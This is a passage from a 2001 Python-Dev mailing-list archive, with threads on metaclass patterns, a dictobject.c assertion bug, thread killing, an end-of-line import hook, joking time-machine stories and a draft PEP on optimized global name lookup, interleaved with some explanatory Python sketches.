Class1 = Class1Meta.Class1      # Make the Class1 name accessible

# define subclasses:
class Class2MetaClass(Class1MetaClass):
    [rest of code omitted]

# use them:
Class1Meta.whoami()     # invoke "class method" of base class
Class1().whoami()       # make an instance & invoke "instance method"
i = Class1Meta()        # make another instance...
i.whoami()              # ...invoke "instance method"
<--- end of code --->

I find this idea very interesting, but you have to be very verbose: Define a Class1MetaClass, create an instance to use as the metaclass, remember to use Class1MetaClass (and not! Class2Meta) to define subclasses. ------ I would like (and have implemented) the following way to create class methods. You have to supply the magic MetaMixin object as the first object in the base class list.

class SpamClass(MetaMixin):
    # define "class methods"
    def whoami(self):
        print "SpamClass.whoami:", self

    def create(self, arg1, arg2):   # a factory class method
        return self._instance_(arg1, arg2)

    class _instance_:
        # define "instance methods"
        def whoami(self):
            print "instance.whoami:", self

# Subclassing goes this way:
class FooClass(MetaMixin, SpamClass):
    def create(self, arg1, arg2):   # override the factory method
        return self._instance_(arg2, arg1)

    class _instance_(SpamClass._instance_):
        # define "instance methods"
        def blah(self):
            print "blah:", self
            self.whoami()

# Test them:
print SpamClass         #prints:
SpamClass.whoami()      #prints: SpamClass.whoami:
s = SpamClass()
print s                 #prints: <__main__.SpamClass_Instance instance at 007C0DAC>
s.whoami()              #prints: instance.whoami: <__main__.SpamClass_Instance instance at 007C0DAC>

------ Here is finally the code for MetaMixin:

<--- start code --->
def MagicObject(name, bases, dict):
    import types, new
    l = []
    for b in bases:
        if type(b) == types.FunctionType:
            # we will see our MetaMixin function here,
            # but this cannot be used in bases
            continue
        if type(b) == types.InstanceType:
            l.append(b.__class__)
        else:
            l.append(b)
    bases = tuple(l)
    # define a new class
    Class = new.classobj(name, bases, dict)
    # create an instance of this class
    # without calling its __init__ method
    class_instance = new.instance(Class, {})
    # new protocol for initializing
    try:
        class_instance.__init_class__
    except AttributeError:
        pass
    else:
        class_instance.__init_class__()
    Instance = new.classobj("%s_Instance" % name, \
                            Class._instance_.__bases__, \
                            Class._instance_.__dict__)
    Instance.__dict__['__meta__'] = class_instance
    Class._instance_ = Instance
    return class_instance

def MetaMixin():
    pass

MetaMixin.__class__ = MagicObject
<--- end code --->

Comments? Thomas From guido@digicool.com Wed May 23 19:02:06 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 14:02:06 -0400 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200." <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> Message-ID: <200105231802.f4NI26408784@odiug.digicool.com> > [this message has also been posted to comp.lang.python] [And I'm cc'ing there] > Guido's metaclass hook in Python goes this way: > > If a base class (let's better call it a 'base object') > has a __class__ attribute, this is called to create the > new class. > > >From demo/metaclasses/index.html: > > class C(B): > a = 1 > b = 2 > > Assuming B has a __class__ attribute, this translates into: > > C = B.__class__('C', (B,), {'a': 1, 'b': 2}) Yes. > Usually B is an instance of a normal class. No, B should behave like a class, which makes it an instance of a metaclass. > So the above code will create an instance of B, > call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2}, > and assign the instance of B to the variable C. No, it will not create an instance of B. It will create an instance of B.__class__, which is a subclass of B. The difference between subclassing and instantiation is confusing, but crucial, when talking about metaclasses!
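Guido's distinction between subclassing and instantiation can be checked with a minimal sketch. It assumes Python 3, where the hook is spelled with the metaclass= keyword instead of a __class__ attribute on a base. The names Meta, B, C and C2 are hypothetical. Calling B's metaclass directly builds a class that is an instance of the metaclass and a subclass of B, not an instance of B.

```python
class Meta(type):
    """Hypothetical metaclass: its instances are classes."""


class B(metaclass=Meta):
    pass


# The class statement...
class C(B):
    a = 1
    b = 2


# ...is roughly equivalent to calling B's metaclass directly:
C2 = type(B)('C2', (B,), {'a': 1, 'b': 2})

print(type(C) is Meta, type(C2) is Meta)     # True True
print(issubclass(C2, B), isinstance(C2, B))  # True False
```

"Roughly" matters here: Python 3 derives the metaclass from all the bases and also runs `__prepare__`, but for a single base the result is the same kind of object.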
See the ASCII art in my classic post to the types-sig: http://mail.python.org/pipermail/types-sig/1998-November/000084.html > I've ever since played with this metaclass hook, and > always found the problem that B would have to completely > simulate the normal python behaviour for classes (modifying > of course what you want to change). > > The problem is that there are a lot of successful and > unsucessful attribute lookups, which require a lot > of overhead when implemented in Python: So the result > is very slow (too slow to be usable in some cases). Yes. You should be able to subclass an existing metaclass! Fortunately, in the descr-branch code in CVS, this is possible. I haven't explored it much yet, but it should be possible to do things like:

Integer = type(0)
Class = Integer.__class__   # same as type(Integer)

class MyClass(Class):
    ...

MyObject = MyClass("MyObject", (), {})
myInstance = MyObject()

Here MyClass declares a metaclass, and MyObject is a regular class that uses MyClass for its metaclass. Then, myInstance is an instance of MyObject. See the end of PEP 252 for info on getting the descr-branch code (http://python.sourceforge.net/peps/pep-0252.html). > ------ > > Python 2.1 allows to attach attributes to function objects, > so a new metaclass pattern can be implemented. > > The idea is to let B be a function having a __class__ attribute > (which does _not_ have to be a class, it can again be a function). Oh, yuck. I suppose this is fine if you want to experiment with metaclasses in 2.1, but please consider using the descr-branch code instead so you can see what 2.2 will be like! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 23 19:40:58 2001 From: mal@lemburg.com (M.-A.
Lemburg) Date: Wed, 23 May 2001 20:40:58 +0200 Subject: [Python-Dev] Daily Python URL on your Palm Message-ID: <3B0C043A.D5C9C604@lemburg.com> Just thought you might want to know that Fredrik's Daily Python URL can be downloaded onto the Palm as an AvantGo channel. Here's the URL for adding the channel: http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00 PS: It would be nice if Fredrik could provide a "printable" version of the Daily URL page, since the table layout doesn't work too well on the small Palm display. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller@ion-tof.com Wed May 23 19:57:28 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 20:57:28 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> <200105231802.f4NI26408784@odiug.digicool.com> Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook> Let me try again (and please forgive my mistakes in the detail). The usual way (as in demo\metaclasses):

class B_Meta:
    ....

B = B_Meta('B', (), {})

class C(B):
    pass

B is an instance of the (meta)class B_Meta. C is now another instance of the same (meta)class, because B.__class__, which is the (meta)class itself, is called, and returns a new instance. B_Meta can (and must) implement a lot of behaviour. In contrast, with my recipe:

def MagicFunction(name, bases, dict):
    ...construct a class on the fly...
    ...create an instance of this class...
    return an_instance_of_a_class

def B_Meta():
    pass

B_Meta.__class__ = MagicFunction

class C(B_Meta):
    pass

Now C is an_instance_of_a_class (which is an instance of a normal python class), and thus does inherit the normal behaviour of Python classes. Thomas PS: I'm sure this all will be much better in descr-branch. I've checked it out and am playing with it from time to time, but most of the time I have to use released Python versions. From tim.one@home.com Wed May 23 20:32:59 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 15:32:59 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523160025.B690@xs4all.nl> Message-ID: [Thomas Wouters] > > As those of you on python-checkins might have noticed ;) I started > checking in Python 2.1.1 bugfixes. And bless you for it, Thomas! > I'd hoped to finish all of my backlog today, but unfortunately I'm > now called away on a surprise emergency meeting, Now that sucks. Tell your manager that you'll only attend planned emergency meetings from now on: Guido plans Python crises years in advance, and it shows in the relative cleanliness of the Python codebase . From nas@python.ca Wed May 23 20:41:14 2001 From: nas@python.ca (Neil Schemenauer) Date: Wed, 23 May 2001 12:41:14 -0700 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010523124114.A4747@glacier.fnational.com> Tim Peters wrote: > Guido plans Python crises years in advance, and it shows in the > relative cleanliness of the Python codebase . I don't think Thomas has a time machine. Neil From tim.one@home.com Wed May 23 20:45:06 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 15:45:06 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net> Message-ID: [Aahz] > Okay, so we all know it isn't possible to kill threads cleanly and > safely in any kind of cross-platform way.
At the same time, a program > that has a thread running haywire should be able to kill itself > completely, so that a monitoring process can restart it. How hard would > it be to do only that in a cross-platform way? Since Python is written in C, and C says nothing about this, you need a platform expert for each platform covered by "cross" . > I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No > clue what would need to happen for Windows and Mac. > > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) Please open a bug report on that, then, with a tiny test case if possible. This worked fine on Win98SE for me just now:

import thread, os, time

def task():
    while 1:
        print "x",
        time.sleep(.1)

for i in range(10):
    thread.start_new_thread(task, ())

time.sleep(5)
os._exit(1)

Windows kills all threads spawned by a process when "the main thread" exits. You don't need to do os._exit(), and sys.exit() is normally a much better idea (else, e.g., stdio buffers may not get flushed to disk). From thomas@xs4all.net Wed May 23 21:27:51 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 22:27:51 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> Message-ID: <20010523222751.G690@xs4all.nl> On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote: > Tim Peters wrote: > > Guido plans Python crises years in advance, and it shows in the > > relative cleanliness of the Python codebase . > > I don't think Thomas has a time machine. *Don't* get me started on that. If only Guido would stop hogging the damned thing, I could be a 34-year-old millionaire in a 10-room house and 8 girlfriends ! Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly y'rs, -- Thomas Wouters Hi!
I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one@home.com Wed May 23 21:32:04 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 16:32:04 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl> Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. You wouldn't happen to have a reproducible test case? That hash==8 is almost certainly a red herring -- or a sign of wild stores . > Going back to revision 2.90 fixes the problem (or masks it). Instead of:

    assert(mp->ma_fill < mp->ma_size);

this code used to be:

    if (mp->ma_fill >= mp->ma_size) {
        /* No room for a new key.
         * This only happens when the dict is empty.
         * Let dictresize() create a minimal dict.
         */
        assert(mp->ma_used == 0);
        if (dictresize(mp, 0) != 0)
            return -1;
        assert(mp->ma_fill < mp->ma_size);
    }

so the dict would get resized whenever ma_fill >= ma_size, although the code only *expected* that to happen when the dict table was NULL. It was perhaps happening in other cases too. The dict is never empty (NULL) after the patch, so the special case for "empty" got replaced by an assert. Offhand I don't see how this could be triggering -- although *something* about the 2.90 logic makes me uneasy! Ah, mp->ma_fill >= mp->ma_size wasn't a correct test: filled slots that aren't used slots don't stop a new key from being added. Assuming that's it, 2.90 could do needless calls to dictresize, but the new version does a bogus assert instead. So replace the current version's offending

    assert(mp->ma_fill < mp->ma_size);

with

    assert(mp->ma_used < mp->ma_size);

Let me know whether that solves it. 2.90 may also suffer a bogus

    assert(mp->ma_used == 0);

failure.
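Tim's point is that filled slots (live keys plus the dummy markers that deletions leave behind) are not the same as used slots (live keys only). A toy open-addressing table makes the difference visible. This is a hypothetical Python model, not CPython's dictobject.c: it uses plain linear probing and never resizes. With 5 inserts, 5 deletes and then further inserts into an 8-slot table, fill reaches the table size while only a few keys are live, and one more key still fits into a dummy slot.

```python
DUMMY = object()  # marker left in a slot whose key was deleted


class ToyTable:
    """Hypothetical toy model of an open-addressing hash table.

    Uses linear probing and never resizes (CPython's dict does both
    differently). 'used' counts live keys; 'fill' counts live keys
    plus DUMMY slots, i.e. every slot that is no longer empty.
    """

    def __init__(self, size=8):
        self.slots = [None] * size
        self.used = 0
        self.fill = 0

    def _probe(self, key):
        # Visit every slot exactly once, starting at the key's home slot.
        n = len(self.slots)
        start = hash(key) % n
        return [(start + k) % n for k in range(n)]

    def insert(self, key):
        free = None  # first DUMMY or empty slot seen on the probe path
        for i in self._probe(key):
            k = self.slots[i]
            if k is None:
                if free is None:
                    free = i
                break  # the key cannot appear further along the path
            if k is DUMMY:
                if free is None:
                    free = i
            elif k == key:
                return  # key already present
        if free is None:
            raise RuntimeError("no empty or dummy slot left")
        if self.slots[free] is None:
            self.fill += 1  # only a truly empty slot raises 'fill'
        self.slots[free] = key
        self.used += 1

    def delete(self, key):
        for i in self._probe(key):
            k = self.slots[i]
            if k is None:
                break
            if k is not DUMMY and k == key:
                self.slots[i] = DUMMY  # stays filled so probe chains survive
                self.used -= 1
                return
        raise KeyError(key)


t = ToyTable(8)
for i in range(5):
    t.insert(i)
for i in range(5):
    t.delete(i)
print(t.used, t.fill)  # 0 5
for i in range(5, 8):
    t.insert(i)
print(t.used, t.fill)  # 3 8: no empty slot left, yet only 3 live keys
t.insert(8)            # still succeeds by reusing a DUMMY slot
print(t.used, t.fill)  # 4 8
```

The model shows only that fill == size does not mean a new key cannot be added. It does not show how CPython itself should resize.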
It's not easy to provoke any of this, though (requires exactly the right sequence of mixed inserts and deletes, with hash codes hitting exactly the right dict slots). From barry@digicool.com Wed May 23 21:52:22 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 16:52:22 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> Message-ID: <15116.8966.324136.897953@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> *Don't* get me started on that. If only Guido would stop TW> hogging the damned thing, I could be a 34-year-old millionaire TW> in a 10-room house and 8 girlfriends ! It's really not as easy as all that, though. When Guido's not around, I've been known to, er, take The Machine for a spin (sshh! Do /not/ tell him!). The first time I did, I didn't realize that the blue toggle had to be in the down position, and when I stepped out, everybody was speaking Esperanto, had half their heads shaved, and were toting around what looked like a cross between a dog and a beach ball (it drooled incessantly). Fortunately, The Machine has a reset button (oddly labeled "History Erase Button" and guarded by a candy-crazed TV announcer-like automaton who must be coaxed from the button with a marshmallow s'more). The second time I used it, I'd forgotten that you must keep your left hand on the silver sphere while you line up the parallel lines with the lip-actuated alpha wheel. Silly me, I'd removed my left hand just before alignment in order to twist the fluoroscopic reflection tube a quarter rotation out of phase (rule of thumb: never listen to that automaton when he's licked the last of the chocolate-y goo from his fingers. He'll say anything to get another s'more.) You really don't want to know what that particular world looked like, but let's just say it involved lots and lots of angry elephants.
So now I leave well enough alone, and I've learned that if you really want to change the past, just wait for Guido to use it for his own nefarious purposes, and tape a sign to his back requesting the (very modest) change to the continuum that you're looking for. And don't forget to smear the front of that sign with s'more. -Barry From tim.one@home.com Wed May 23 22:02:17 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 17:02:17 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. [Tim] > You wouldn't happen to have a reproducible test case? Never mind; I do:

d = {}
for i in range(5):
    d[i] = i
for i in range(5):
    del d[i]
for i in range(5, 9):   # assert triggers when i == 8
    d[i] = i

The cure is more complicated than I described, though. From esr@thyrsus.com Wed May 23 23:39:49 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 18:39:49 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523183949.A19251@thyrsus.com> Barry A. Warsaw : > You really don't want to know what that particular world looked like, > but let's just say it involved lots and lots of angry elephants. You've been *there*? Dang...that's the timeline that scared me into hanging up my lab coat. It was a slow Saturday and I was hatching Sinister Plan For World Domination number 4. What happened to the other three?
Well...I had been planning to terrorize the western U.S with a giant mechanical spider, until some guys from Hollywood offered me way too much money for it. The trained army of radioactive gorillas I spent the movie money on didn't work out -- my Igor flatly refused to shovel any more radioactive gorilla poop, and you know how hard it is to get good help these days. Blackmailing major cities with a Zeppelin-mounted death ray projector sounded cool but Radio Shack was out of the parts. OK, so plan #4 was to create voracious mega-amoebas using my Ionic Mutatron and send them out to destroy all my enemies, especially that kid who beat me up in third grade. There I was, cackling insanely, just about to unleash these slimy horrors on an unsuspecting world to wreak havoc and destruction, when the eka-rhodium electrodes on the Mutatron arced over. This produced a wild spike of temporokinetic energy, and guess where *I* was standing? Silly me. Before you could say "plot complication" I was materializing in the Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself, as it turned out, who was getting wound up to try out his newest human-goad on a mahout they had just captured from the Fortified Cities. The mahout was terrified out of his wits, and you would have been too if you'd seen what the High Pachyderm's tusks were covered with and the lascivious way his trunk was curled around that cheese grater. Euggghhh... It was crazy. The High Pachyderm was trumpeting like mad, tuskers charging at me from all directions, and me with at least 5.23 seconds to go until the temporokinetic charge wore off. Fortunately I remembered that elephants communicate using modulated infrasonics that they hear with the flat part of their foreheads, and I had my trusty sonic screwdriver on me. I set it to "infra" at maximum volume and hurled it at the High Pachyderm -- hit the bugger right in the tiara. 
He went berserk and his confused guards started crashing into each other left and right, which was a pretty impressive sight since the smallest of them weighed over two and a half tons. It was touch and go there, let me tell you. I caught one glimpse of the mahout's rapidly-retreating heels just as the charge wore off and I was slingshotted back to my lab. My sonic screwdriver, of course, followed within seconds -- horribly crushed and mangled. And that's when I swore off building fiendish devices. Electrocution I can laugh at, having my monstrous creations turn on me is all in a day's work, and that one time I was accidentally transformed into a fly I found some truly remarkable uses for a three-foot-long prehensile tongue. But what the High Pachyderm had planned was too twisted even for *me*. I decided Sinister Plan #5 would have to be a bit less hardware-intensive, if only as a rest for my frazzled nerves. So I spent the last juice in the batteries on the orbital mind-control lasers (long story) to implant some subtle suggestions in a few minds at Netscape and IBM and elsewhere, and started hitting the conference circuit pretty heavy. What suggestions? Oh, nothing important. Nothing at all...BWAHAHAHAHA!!! -- Eric S. Raymond Sometimes the law defends plunder and participates in it. Sometimes the law places the whole apparatus of judges, police, prisons and gendarmes at the service of the plunderers, and treats the victim -- when he defends himself -- as a criminal. 
-- Frederic Bastiat, "The Law" From gward@python.net Thu May 24 00:48:10 2001 From: gward@python.net (Greg Ward) Date: Wed, 23 May 2001 19:48:10 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523194810.A9947@gerg.ca> On 23 May 2001, Barry A. Warsaw said: > The second time I used it, I'd forgotten that you must keep your left > hand on the silver sphere while you line up the parallel lines with > the lip-actuated alpha wheel. What? You mean Guido's time machine was really designed by Larry Wall? Oh, the irony... Greg -- Greg Ward - Python bigot gward@python.net http://starship.python.net/~gward/ If you can read this, thank a programmer. From dgoodger@bigfoot.com Thu May 24 02:04:46 2001 From: dgoodger@bigfoot.com (David Goodger) Date: Wed, 23 May 2001 21:04:46 -0400 Subject: [Python-Dev] Re: Import hook to do end-of-line conversion? In-Reply-To: <3B0AF45D.732126E6@home.net> Message-ID: Yesterday I found I needed an end-of-line conversion import hook. I looked around but found none (did I miss some code on this thread?), so I whipped one up (below). It seems to do the job. If you see any goofs, gaffes or gotchas, or if you know of a better way to do this, please let me know. I will post this code to c.l.py in a few days for the enjoyment of all. -- David Goodger dgoodger@bigfoot.com Open-source projects: - The Go Tools Project: http://gotools.sourceforge.net - reStructuredText: http://structuredtext.sourceforge.net (soon!)
-----%<----------cut----------%<----------%<----------cut----------%<-----
# Import hook for end-of-line conversion,
# by David Goodger (dgoodger@bigfoot.com).

# Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to
# import Python modules with any of Unix, Mac, or Windows line endings.

import ihooks, imp, py_compile

class MyHooks(ihooks.Hooks):

    def load_source(self, name, filename, file=None):
        """Compile source files with any line ending."""
        if file:
            file.close()
        py_compile.compile(filename)    # line ending conversion is in here
        cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb')
        try:
            return self.load_compiled(name, filename, cfile)
        finally:
            cfile.close()

class MyModuleLoader(ihooks.ModuleLoader):

    def load_module(self, name, stuff):
        """Special-case package directory imports."""
        file, filename, (suff, mode, type) = stuff
        path = None
        if type == imp.PKG_DIRECTORY:
            stuff = self.find_module_in_dir("__init__", filename, 0)
            file = stuff[0]             # package/__init__.py
            path = [filename]
        try:                            # let superclass handle the rest
            module = ihooks.ModuleLoader.load_module(self, name, stuff)
        finally:
            if file:
                file.close()
        if path:
            module.__path__ = path      # necessary for pkg.module imports
        return module

ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install()

From jeremy@alum.mit.edu Thu May 24 02:10:55 2001 From: jeremy@alum.mit.edu (Jeremy Hylton) Date: Wed, 23 May 2001 21:10:55 -0400 (EDT) Subject: [Python-Dev] pre-PEP on optimized global names Message-ID: <200105240110.VAA09078@newman.concentric.net> I've been hoping to work on optimized global and builtin name support for Python 2.2. I'm not sure if I'll have time, but thought I'd circulate a draft with some notes on the subject now. Anyone interested in this work? Jeremy

PEP: ???
Title: Optimized Access to Module and Builtin Names
Author: jeremy@digicool.com (Jeremy Hylton)
Status: Draft
Type: Standards Track
Python-Version: 2.2
Created: 23-May-2001

Abstract

This PEP proposes a new implementation of global module namespaces and the builtin namespace that speeds name resolution.
The implementation would use an array of object pointers for most operations in these namespaces. The compiler would assign indices for global variables at compile time. The current implementation represents these namespaces as dictionaries. A global name incurs a dictionary lookup each time it is used; a builtin name incurs two dictionary lookups, a failed lookup in the global namespace and a second lookup in the builtin namespace. This implementation should speed Python code that uses module-level functions and variables. It should also eliminate awkward coding styles that have evolved to speed access to these names. The implementation is complicated because the global and builtin namespaces can be modified dynamically in ways that are impossible for the compiler to detect. (Example: A module's namespace is modified by a script after the module is imported.) As a result, the implementation must maintain several auxiliary data structures to preserve these dynamic features. Introduction [expand on the basic ideas in the abstract] [describe the key parts of the design: dlict, compiler support, stupid name trick workarounds, optimization of other modules' globals] DLict design The namespaces are implemented using a data structure that has sometimes gone under the name dlict. It is a dictionary that has numbered slots for some dictionary entries. The type must be implemented in C to achieve acceptable performance.
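For comparison with the dlict design, the cost model the abstract describes for the current dictionary-based scheme (one lookup for a module global; a failed lookup plus a second lookup for a builtin) can be sketched in modern Python. This is an illustrative model, not CPython's actual LOAD_GLOBAL code; `resolve_global` and `count_nonempty` are hypothetical names. The `len=len` default argument is one well-known example of the "awkward coding styles" the abstract presumably has in mind.

```python
import builtins


def resolve_global(name, module_globals, builtin_ns=None):
    """Model of today's global-name lookup; returns (value, dict_lookups_used)."""
    if builtin_ns is None:
        builtin_ns = vars(builtins)
    try:
        return module_globals[name], 1        # hit in the module's dict
    except KeyError:
        pass                                  # first lookup failed...
    try:
        return builtin_ns[name], 2            # ...so try the builtin dict
    except KeyError:
        raise NameError(name) from None


def count_nonempty(seqs, len=len):
    # Speed idiom: binding a builtin as a default argument makes every use
    # of 'len' a local access instead of a global-then-builtin lookup.
    n = 0
    for s in seqs:
        if len(s):
            n += 1
    return n
```

A global shadowing a builtin is found on the first lookup, which is why the dlict scheme needs a way to notice such shadowing when it is added dynamically.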
A Python implementation is included here to explain the basic design:

    """A dictionary-list hybrid"""

    import types

    class DLict:
        def __init__(self, names):
            # names maps each global name known at compile time to its slot index
            assert isinstance(names, types.DictType)
            self.names = names
            size = len(names)
            self.list = [None] * size   # slot values
            self.empty = [1] * size     # 1 = slot unbound, None = slot bound
            self.dict = {}              # names not known at compile time
            self.size = 0               # number of bound slots

        def __getitem__(self, name):
            i = self.names.get(name)
            if i is None:
                return self.dict[name]
            if self.empty[i] is not None:
                raise KeyError, name
            return self.list[i]

        def __setitem__(self, name, val):
            i = self.names.get(name)
            if i is None:
                self.dict[name] = val
            else:
                if self.empty[i] is not None:
                    self.size += 1      # count a slot only when it becomes bound
                self.empty[i] = None
                self.list[i] = val

        def __delitem__(self, name):
            i = self.names.get(name)
            if i is None:
                del self.dict[name]
            else:
                if self.empty[i] is not None:
                    raise KeyError, name
                self.empty[i] = 1
                self.list[i] = None
                self.size -= 1

        def keys(self):
            # only bound slots, plus dynamically added names
            return [name for name, i in self.names.items()
                    if self.empty[i] is None] + self.dict.keys()

        def values(self):
            return [self.list[i] for i in self.names.values()
                    if self.empty[i] is None] + self.dict.values()

        def items(self):
            return [(name, self.list[i]) for name, i in self.names.items()
                    if self.empty[i] is None] + self.dict.items()

        def __len__(self):
            return self.size + len(self.dict)

        def __cmp__(self, dlict):
            c = cmp(self.names, dlict.names)
            if c != 0:
                return c
            c = cmp(self.size, dlict.size)
            if c != 0:
                return c
            for i in range(len(self.names)):
                c = cmp(self.empty[i], dlict.empty[i])
                if c != 0:
                    return c
                if self.empty[i] is None:
                    c = cmp(self.list[i], dlict.list[i])
                    if c != 0:
                        return c
            return cmp(self.dict, dlict.dict)

        def clear(self):
            self.dict.clear()
            for i in range(len(self.names)):
                if self.empty[i] is None:
                    self.empty[i] = 1
                    self.list[i] = None
            self.size = 0

        def update(self):
            pass

        def load(self, index):
            """dlict-special method to support indexed access"""
            if self.empty[index] is None:
                return self.list[index]
            else:
                raise KeyError, index # XXX might want reverse mapping

        def store(self, index, val):
            """dlict-special method to support indexed access"""
            if self.empty[index] is not None:
                self.size += 1
            self.empty[index] = None
            self.list[index] = val

        def delete(self, index):
            """dlict-special method to support indexed access"""
            if self.empty[index] is not None:
                raise KeyError, index
            self.empty[index] = 1
            self.list[index] = None
            self.size -= 1

Compiler issues The compiler currently collects the names of all global variables in a module. These are names bound at the module level or bound in a class or function body that declares them to be global. The compiler would assign indices for each global name and add the names and indices of the globals to the module's code object. Each code object would then be bound irrevocably to the module it was defined in. (Not sure if there are some subtle problems with this.) Enhancement: Optimized access to other modules' globals If one module imports another and binds a name in the global namespace, the compiler can detect that the particular global is bound to a module. The compiler would also note accesses to any attribute of a module and emit special opcodes for accessing these names. At runtime the implementation can look up the index of the module attribute in the module's namespace. In the current namespace, a pointer to the foreign module's dlict can be recorded along with the name's offset in the dlict. This would allow names, e.g. types.StringType, to be used with the same efficiency as globals. Backwards compatibility The dlict will need to maintain metainformation about whether a slot is currently used or not. It will also need to maintain a pointer to the builtin namespace. When a name is not currently used in the global namespace, the lookup will have to fail over to the builtin namespace. In the reverse case, each module may need a special accessor function for the builtin namespace that checks to see if a global shadowing the builtin has been added dynamically. This check would only occur if there was a dynamic change to the module's dlict, i.e. when a name is bound that wasn't discovered at compile-time.
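The compiler, foreign-module and fallback steps described above can be tied together in a small modern-Python sketch. It rests on stated assumptions: the standard `symtable` module stands in for the compiler's global-name collection pass, slots are numbered in sorted name order (an arbitrary choice), and `global_slots`, `IndexedGlobals` and `bind_foreign` are hypothetical names, not part of any Python release or of the draft PEP.

```python
import builtins
import symtable

_EMPTY = object()  # sentinel marking an unbound slot


def global_slots(source):
    """Hypothetical compile-time pass: give each global binding a slot index.

    Collects names assigned or imported at module level, plus names that a
    function or class body declares global and then assigns.
    """
    top = symtable.symtable(source, "<module>", "exec")
    names = {s.get_name() for s in top.get_symbols()
             if s.is_assigned() or s.is_imported()}
    pending = list(top.get_children())
    while pending:
        table = pending.pop()
        for s in table.get_symbols():
            if s.is_declared_global() and s.is_assigned():
                names.add(s.get_name())
        pending.extend(table.get_children())
    return {name: i for i, name in enumerate(sorted(names))}


class IndexedGlobals:
    """Sketch of a dlict-style namespace: fixed slots plus an overflow dict."""

    def __init__(self, slots):
        self.slots = slots                   # name -> index, fixed at "compile time"
        self.values = [_EMPTY] * len(slots)  # one cell per compile-time global
        self.extra = {}                      # names bound dynamically at runtime

    def store(self, index, value):
        self.values[index] = value

    def load(self, index, name):
        """Indexed global load; an unbound slot fails over to the builtins."""
        value = self.values[index]
        if value is not _EMPTY:
            return value
        return self.load_builtin(name)

    def bind_dynamic(self, name, value):
        """Bind a name from outside, e.g. a script poking the module."""
        if name in self.slots:
            self.store(self.slots[name], value)
        else:
            self.extra[name] = value

    def load_builtin(self, name):
        # Pay for the shadowing check only after a dynamic addition.
        if self.extra and name in self.extra:
            return self.extra[name]
        try:
            return vars(builtins)[name]
        except KeyError:
            raise NameError(name) from None


def bind_foreign(other, name):
    """Resolve another module's attribute to a slot once; later reads index it."""
    index = other.slots[name]
    return lambda: other.load(index, name)
```

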